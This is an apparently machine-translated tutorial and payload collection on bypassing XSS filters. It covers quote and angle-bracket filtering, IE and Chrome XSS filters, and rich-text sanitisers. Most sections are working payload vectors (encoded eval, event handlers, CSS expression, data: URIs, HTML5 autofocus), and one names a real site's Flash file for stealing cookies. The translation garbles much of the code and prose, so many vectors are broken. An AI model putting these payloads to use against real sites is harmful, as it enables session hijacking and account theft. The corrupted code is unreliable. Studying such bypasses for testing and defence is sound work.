Bypass Technology in cross-site testing and exploitation

Directory
 
Bypass Char
Quotation marks
Angle brackets
Brackets
Bypass filter
IE Filter
Chrome filter
Bypass richtext
Bypass rules
Exploitation skills
References
1.1 bypass Char
Generally, security-aware programmers often filter input. A common method is to filter a key symbol, such as "<" or "> ", this method is often unable to prevent attacks. The more secure method is to filter the output through functions provided by programming languages.
 
This section mainly studies single character filtering, including quotation marks, angle brackets, and brackets.
 
1.1.1 quotation marks
In cross-site tests, many vectors (that is, attack vectors) themselves do not contain quotation marks, such as the following vectors. However, quotation marks are often used in exploitation. If quotation marks are filtered, the following measures can be taken to bypass them.
 
Vector: <script> alert (/ourren_demo/) </script> <iframe/onload = alert (/ourren_demo/)> Src = x onerror = alert (/ourren_demo/)> <p
Onmouseover = alert (/ourren_demo/)> ourren_demo here. </p>
 
1) String. fromCharCode
 
FromCharCode can encode the quotation marks in the code, but it must be used in combination with the eval function. For example:
 
<Script> alert ('ourren _ demo') </script>
-----> <Script> eval (String. fromCharCode (97,108,101,114,116, 40,
39,105,110,115,105,103,104,116,

45,108, 97,98, 115,39, 41) </script>
 
2) location. hash
 
Put the content with quotation marks in location. hash. In fact, this can also break through the cross-site Length Control.
 
<Script> eval (location. hash. slice (1) </script> # alert ('A ')
 
1.1.2 angle brackets
Generally, programmers only filter angle brackets for laziness. Therefore, angle brackets are the most frequently used in cross-site filtering. Generally, if the input is not displayed in other labels, there is basically no way to attack. However, if the input is output to other labels, you can use the upper and lower labels for the following test:
 
1) event Functions
 
Common event functions include onerror, onmouseover, and onload (you can also focus on the new HTML5 tag). You can perform fuzz on JavaScript event functions when necessary.
 
? 1234 Src = x onerror = alert (/ourren_demo/)> <p
Onmouseover = alert (/ourren_demo/)> ourren_demo here. </p> <frameset
Onload = alert (/ourren_demo/)> <body
Onload = alert (/ourren_demo/)>
 
2) style and expression
 
Use the style of the label for Cross-Site (IE is successful only in the test, and the filter problem must be considered ).
 
<Div
Style = "width: expression (alert ('ourren _ demo');">
 
3) JavaScript pseudo Protocol
 
JavaScript pseudo-Protocol bypass.
 
Src = javascript: alert ('ourren _ demo')>
(IE Only)
 
1.1.3 brackets
If brackets are filtered out or cannot be injected, perform the following tests:
 
1) external files
 
Use src to introduce external files and place code in external files (the extension of the external files can not be JavaScript ).
<Script
Src = '1. js'> </script> <script
Srcw.'2.jpg '> </script>
 
2) hex and dec Encoding
 
Uses hexadecimal and decimal encoding.
 
<Div
Style = "& #119 & #105 & #100 & #116 & #104 & #58 & #101 & #120 & #112 & #114
& #101 & #115 & #115 & #105 & #111 & #110 & #40 & #97 & #108 & #101 & #114 &#
116 & #40 & #39 & #120 & #115 & #115 & #101 & #114 & #39 & #41 & #41 "> xsser </div>
 
1.2 bypass filter
In view of the increasingly serious problem of Cross-Site, browser vendors have launched their own cross-site filters based on their browser security. However, these filters basically only support cross-site reflection.
 
Different browsers use different defense mechanisms. Reflective cross-site defense: Firefox has almost no defense, while IE and chrome both have their own defense mechanisms and are difficult to bypass. Here we mainly summarize some existing bypass mechanisms.
 
1.2.1 IE Filter
Internet Explorer supports XSS Filter from Internet Explorer 7. The overall architecture of Internet Explorer is shown in reference 1. For more information about regular expression matching, see article 2. The actual processing steps can be divided into three steps: firstly, heuristic filtering (heuristic filters, regular expression matching) is performed for IE. If these features are matched in HTTP requests, create dynamic signature. If the original signature exists in the HTTP response, replace it with neuter response ). Tests are carried out under the full IE patch. Currently, few bypass technologies are published. The following is a summary:
 
1) <a href =>
 
For common reflective cross-site, you can use the tag and "SC % 0aript" to bypass. However, user interaction is required. Here, an artist is required. The principle is that the two pages after page output belong to the same domain, so no filtering is generated. If the address in href is in different fields, filtering is generated.
 
<
Href = "xss. php? A = <SC % 0 arept> alert (/ourren_demo/) </script> "> <
Href = "xss. php? A = <SC % 0 arept> alert (/ourren_demo/) </script> "> <div
Style = "position:
Absolute; left: 0px; top: 0px; height: 1000px; width: 1000px; padding:
1em; background: black; text-align: center; "> click
To continue </div> </a>
 
2) utf7
 
Through the UTF7-BOM Implementation of injection code, the full patch can be successful only when the header is encoded as the utf-7, you can refer to Article 3.
 
% 2BACIAPgA8-script % 2BAD4-alert % 28/ourren_demo/% 29% 2BADw-% 2F
Script % 2BAD4APAAi-& oe = Windows-31J
 
3) Flash
 
Use iframe to embed the flash XSS file www.A.com under the domain name www. B .com. When the victim opens the domain name www. B .com, we can successfully obtain its cookies on www.A.com. See document 8.
 
The test code is as follows (IE ):
<Iframe/src = "http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf

? Get-data =
(Function () {location. href = % 22 javascript: '<script> alert (document. cookie)
</Script> '% 22}) () "> </iframe>
 
In chrome, the browser may crash. You can use the following code instead.
 
<Iframe/src = "http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf
? Get-data = (function () {alert (document. cookie)}) () "> </iframe>
 
1.2.2 chrome filter
The filtering rules for xss in chrome are quite different from those for IE. Different Versions of chrome are also different. For more information, see articles 4 and 5.
 
1) data Protocol
 
Vuln = <
Href = "javascript: alert (document. cookie);"> click </a>
// Intercept --> convert
<A href = "javascript: void (0)"> click </a> // bypass? Vuln = <
Href = "data: text/html;
Base64, PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4 =
"> Click <a>-> OK
 
1.3 bypass richtext
Common Rich Text categories include messages, logs, and emails. Compared with general cross-site analysis, it can use existing labels for testing and analysis. Generally, there are two filtering mechanisms: blacklist and whitelist. These two mechanisms are essentially based on regular expression matching. Therefore, we need to compare the input and output during the test and then make targeted changes.
 
Common Test process: enter common tags and events --> whether existing tags are not filtered --> modify or analyze attributes
 
Tags: object, applet, base, link, meta, import, embed, vmlframe, iframe, script,
Style, isindex, form, textarea,
 
Character: javascript:, vbscript:
 
Event: onload, onerror, on *
 
1.3.1 bypass rules
This Section classifies some common change rules and combines them in multiple ways in actual tests.
 
1) Non-Recursive Filtering
 
Many rich text filtering targets keyword filtering, but does not apply Recursive Filtering. As a result, the filtered results form a new tag. For example:
 
<Ifra <iframe> me> ------ filter ------ <iframe> ---------- <iframe> <s <script>
</Script> scripts>
----- Filter --- <script> ---------- <script> </script>
 
2) Encoding
 
Attackers can use hexadecimal and decimal encoding to bypass keywords. Since expression can only be executed by IE, it is limited to IE.
 
<Div
Style = "width: expression (alert (/ourren_demo/)"> ourren_demo </div>
<Div
Style = "width: \ 0065 xpression (alert (/ourren_demo/)"> ourren_demo </div> // two different types of codes <div
Style = "width: \ 0065xpressio \ 6e (alert (/ourren_demo/)"> ourren_demo </div>
<Div
Style = "& #119 & #105 & #100 & #116 & #104 & #58 & #101 & #120 & #112 & #114 & #101 & #
& #115 & #115 & #105 & #111 & #110 & #40 & #97 & #108 & #101 & #114 &#
116 & #40 & #39 & #120
& #115 & #115 & #101 & #114 & #39 & #41 & #41 "> xsser </div>
 
3) special characters
 
You can insert tab, line feed, and other blank characters or "/**" in the constructed vector to bypass keyword matching, which is basically limited to IE.
 
Src = "java
Scr EPT: alert (/ourren_demo/) ">
Tab twice, ie6 <div
Style = "width: exp/*****/ression (alert (/ourren_demo/)"> ourren_demo </div>
IE
 
4) See the agreement.
 
The object tag is used to encode the date attribute data in base64 to bypass key data, and the object tag is often forgotten.
 
<Object
Data = "data: text/html; base64, PHNjcmlwdD5hbGVydCgvaW5zaWdod
C1sYWJzLyk8L3NjcmlwdD4 = ">
 
5) HTML5
 
Using HTML5 new tags or new attributes for bypassing is relatively harsh. For details, see references 6.
 
New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
 
New Attributes: autocomplete, autofocus, pattern.. etc
 
<Input
Onfocus = write (1) autofocus> <video
Poster = javascript: alert (1) //> </video>
 
6) Browser
 
You can consider it from the perspective of browser resolution. You need to perform in-depth analysis on browser resolution, and then make improvements and analysis to provide several such vectors.
 
// IE annotation Method
 
<! -- [If
 
IE]> Width = 0 height = 0 onerror = alert (/ourren_demo/)> <! [Endif] --> <comment> Src = "</comment> Src = x onerror = alert (/ourren_demo/) // ">
IE
 
1.3.2 exploitation skills
In actual use, we often encounter some other problems, such as code endless loops and insufficient length. First, we will summarize them as follows:
 
1) expression
 
Because expression attributes are special and only Internet Explorer is supported at the same time, its execution is equivalent to an endless EVAL function, and the style Mark cannot contain the ";" character, that is to say, you cannot construct multiple javascript codes connected together. Therefore, the following statement is constructed:
 
<DIV
STYLE = "xss: ex/**/pre/**/ssion (eval (xss ));"
 
Xss = "var
Then = new Date (); Then. setTime

(Then. getTime () + 10*1000 );
If (document. cookie. indexOf ('cookie1 = ')

=-1) {document. cookie = 'cookie1 = RAY; expires =

'+ Then. toGMTString (); alert (/ourren_demo/);} "> //
Set a COOKIE to expire after 10 seconds and execute other statements or functions in this COOKIE statement.
You can also implement the following through the window object:
<Div
Style = "width: expression (window. x = 1 )?
'': (Window. x = 1, alert (/ourren_demo/)"> xsser </div>
 
2) length limit
 
This article details how to break through the limit on the number of XSS characters to execute any JS Code. For more information, see article 7.
Of course, HTML5 browsers can also use local storage.
 
References
1. http://blogs.technet.com/ B /srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
 
2. Abusing Internet Explorer 8's XSS Filters.pdf
 
3. www.2cto.com/Article/201111/109867.html
 
4. www.2cto.com/Article/201110/109039.html
 
5.www.2cto.com/Article/201110/109035.html
 
6. http://html5sec.org/
 
7. http://mongoidan.org/pstzine/012703/txt/pstzine_0x03_0x04.txt
 
8. www.2cto.com/Article/201208/149167.html